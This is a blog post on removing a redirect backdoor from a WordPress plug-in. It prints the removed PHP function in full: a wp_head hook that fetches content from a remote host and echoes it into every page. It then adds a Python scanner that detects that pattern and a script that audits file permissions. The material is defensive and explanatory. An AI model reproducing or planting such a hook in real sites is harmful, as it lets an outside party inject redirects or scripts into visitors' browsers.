Fix your site from unauthorized redirect

Recently I added a plug-in from outside of the WordPress repository. To my horror, one of the files had malware code inserted into the “head” tag. The bad guys are so clever that they made their code run randomly, so it will not be detected by the web developer as soon as the bad plug-in is installed. So how do you know you have problems in your installed scripts? How do you go about fixing them? The answer to the first question is that you probably won’t know until a visitor to your site, or you yourself, comes across it. And if the bad guys are into stealing information such as credit card data, you may be out of luck.

I am going to specifically target one malware injection that anyone can detect: the automated redirection. An automated redirection sends your visitors to whatever website the bad guys want to promote. Most of the time they are directed to survey sites, illegal websites such as drug-trafficking sites, and/or pornographic sites. Regardless of your moral values, the major issue here is that these scripts give you no option to disable or modify their behavior. That’s where programmers like us come in to save your site!

Once in a while, when I tried to view my website, I ended up being redirected to an unknown website. So I dug around and found that a function called wp__head(), hooked into wp_head, in one of the PHP files of the UberMenu plug-in was being used as a backdoor to inject questionable code. I used the Editor in the WP administration page to delete the function completely from TipTour.class.php (the file containing this function). The code I removed was:

function wp__head() {
    // Only runs when the cURL extension is available on the server
    if (function_exists('curl_init'))
    {
        $ch = curl_init();
        // Fetches content from a remote server the site owner does not control
        curl_setopt($ch, CURLOPT_URL, "http://www.jqury.net/?1");
        // Sends the victim site's host name as the referer, which tells the remote
        // server which site is calling and lets it choose what (if anything) to
        // return; this is how the "runs randomly" behavior described above is possible
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, "10");
        $data = curl_exec($ch);
        curl_close($ch);
        // Prints whatever came back straight into the <head> of the page
        echo "$data";
    }
}
// Hooks the function into WordPress's wp_head action, so it fires on every page load
add_action('wp_head', 'wp__head');
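The removed code has a recognizable shape: a callback registered on the wp_head action that fetches a remote URL and echoes the response into the page. The following scanner is an added example, not code from the original post or from the UberMenu plug-in; it walks a plugin directory and flags PHP functions that match that shape. The sample plug-in it scans is constructed for the demonstration, and the host name example.invalid is a placeholder rather than the real one.

```python
"""Flag wp_head callbacks that fetch remote content and echo it into the page.

Added example, not part of the original post or the plug-in it describes.
The sample plug-in below is constructed; example.invalid is a placeholder host.
"""
import os
import re
import tempfile

# add_action('wp_head', 'callback_name') in either quote style
HOOK_RE = re.compile(
    r"""add_action\s*\(\s*['"]wp_head['"]\s*,\s*['"]([A-Za-z_][A-Za-z0-9_]*)['"]"""
)
# Primitives a PHP plug-in would use to pull content from another server
FETCH_RE = re.compile(r"\b(curl_exec|file_get_contents|fopen|wp_remote_get)\s*\(")
URL_RE = re.compile(r"https?://[^\s'\"]+")


def function_body(source, name):
    """Return the body of PHP function `name` in `source`, or '' if it is absent.

    Brace matching is a plain counter, which is enough for plug-in code that
    does not put braces inside string literals within the function.
    """
    match = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", source)
    if not match:
        return ""
    depth, i = 1, match.end()
    while i < len(source) and depth:
        depth += {"{": 1, "}": -1}.get(source[i], 0)
        i += 1
    return source[match.end():i - 1]


def scan_php_source(source):
    """Return one finding per wp_head callback that both fetches and echoes."""
    findings = []
    for hook in HOOK_RE.finditer(source):
        name = hook.group(1)
        body = function_body(source, name)
        fetches = FETCH_RE.search(body) is not None
        echoes = re.search(r"\b(echo|print)\b", body) is not None
        if fetches and echoes:
            findings.append({"callback": name, "urls": URL_RE.findall(body)})
    return findings


def scan_directory(root):
    """Walk `root` and map each matching .php file (relative path) to its findings."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for filename in files:
            if not filename.endswith(".php"):
                continue
            path = os.path.join(dirpath, filename)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_php_source(fh.read())
            if findings:
                results[os.path.relpath(path, root)] = findings
    return results


# Constructed sample plug-in: one benign callback (static tag, no fetch) and one
# that mirrors the injected pattern (remote fetch, then echo of the response).
SAMPLE_PLUGIN = r"""<?php
function demo_meta() { echo '<meta name="generator" content="demo">'; }
add_action('wp_head', 'demo_meta');

function wp__head() {
  if (function_exists('curl_init')) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "http://example.invalid/?1");
    $data = curl_exec($ch);
    curl_close($ch);
    echo "$data";
  }
}
add_action('wp_head', 'wp__head');
"""


def demo():
    """Write the constructed plug-in into a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        plugin_dir = os.path.join(root, "demo-plugin")
        os.makedirs(plugin_dir)
        with open(os.path.join(plugin_dir, "demo.php"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_PLUGIN)
        return scan_directory(root)


if __name__ == "__main__":
    for path, findings in demo().items():
        for finding in findings:
            print(f"{path}: wp_head callback '{finding['callback']}' fetches and "
                  f"echoes remote content from {finding['urls']}")
```

Point scan_directory at wp-content/plugins to check a whole installation. A hit is a reason to read the function, not proof of malware on its own: a legitimate plug-in can fetch and print remote data, but doing it from inside wp_head with a hard-coded URL is exactly what the removed code did.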

Protect yourself

If you find something wrong with your plug-in or notice odd behavior, contact the developers as soon as possible. If you do not know whom to contact for help, try one of the free website scanners, which are available as a plug-in, as a website, or both. In addition, if there is an option to download an add-on directly to your server from either the CMS developers or the add-on/plug-in developer, use their resources. You should also run any externally obtained files through a virus scan before installing them in your http/www folders. After installing anything, check the folder and file permissions using FTP or cPanel (or similar programs) for 777 permissions. If you find any permissions have been changed to 777, immediately change them back manually (USE CAUTION: it may break your website!). Go to the SQL/MySQL administration panel and check for injected scripts; if you find any, make a copy first and then delete them. Report such injections to the developers along with the copy of the injected file.
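The permission check above is easy to automate. The script below is an added example, not from the original post; it walks a web root and reports every file or folder that is exactly 777 or is otherwise writable by everyone, and keeps the fix as a separate step so you can review the report first (some plug-ins legitimately need a writable uploads or cache folder). The sample web root is constructed in a temporary directory, so the script runs anywhere; the baseline modes 644 for files and 755 for folders are an assumption of this example.

```python
"""Report world-writable and 777 entries under a web root.

Added example, not part of the original post. The sample tree is constructed
in a temporary directory; the 644/755 baseline is this example's assumption.
"""
import os
import stat
import tempfile

SAFE_FILE_MODE = 0o644  # owner read/write, everyone else read-only
SAFE_DIR_MODE = 0o755   # owner read/write/enter, everyone else read/enter


def audit_permissions(root):
    """Return sorted (relative_path, octal_mode, reason) tuples for weak entries.

    reason is '777' for the exact value the post warns about, otherwise
    'world-writable' when the "others" write bit is set (for example 666).
    Symbolic links are skipped; their targets are judged where they live.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue
            mode = stat.S_IMODE(st.st_mode)
            if mode == 0o777:
                reason = "777"
            elif mode & stat.S_IWOTH:
                reason = "world-writable"
            else:
                continue
            findings.append((os.path.relpath(path, root), oct(mode), reason))
    return sorted(findings)


def restore_baseline(root, findings):
    """Set 644 on files and 755 on folders named in `findings`.

    Run this only after reading the report: a folder the plug-in must write
    to (uploads, cache) will stop working if it is locked down blindly.
    """
    for rel, _, _ in findings:
        path = os.path.join(root, rel)
        os.chmod(path, SAFE_DIR_MODE if os.path.isdir(path) else SAFE_FILE_MODE)


def demo(fix=False):
    """Build a constructed web root and audit it, optionally fixing it.

    The tree holds a correctly set index.php, a 777 wp-config.php, a 666
    cache.txt and a 777 wp-content/uploads folder. Returns (before, after).
    """
    with tempfile.TemporaryDirectory() as root:
        uploads = os.path.join(root, "wp-content", "uploads")
        os.makedirs(uploads)
        os.chmod(os.path.join(root, "wp-content"), SAFE_DIR_MODE)
        os.chmod(uploads, 0o777)
        for rel, mode in [("index.php", 0o644), ("wp-config.php", 0o777), ("cache.txt", 0o666)]:
            path = os.path.join(root, rel)
            open(path, "w").close()
            os.chmod(path, mode)
        before = audit_permissions(root)
        if fix:
            restore_baseline(root, before)
        after = audit_permissions(root)
        return before, after


if __name__ == "__main__":
    before, after = demo(fix=True)
    for rel, mode, reason in before:
        print(f"{rel}: {mode} ({reason})")
    print(f"after restore_baseline: {len(after)} weak entries")
```

Run audit_permissions against the real document root (for example the folder that holds wp-config.php) after every install, and treat a new 777 entry on a file you did not just change as something to investigate before you fix it.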

Always remember that this is not limited to a single CMS. In fact, any website, even one that does not use a CMS, could end up becoming a victim. However, since CMS programs are very popular among web developers and are used by even government agencies such as whitehouse.gov and ucalgary.ca (Drupal), bad hackers are increasingly targeting CMS-based websites.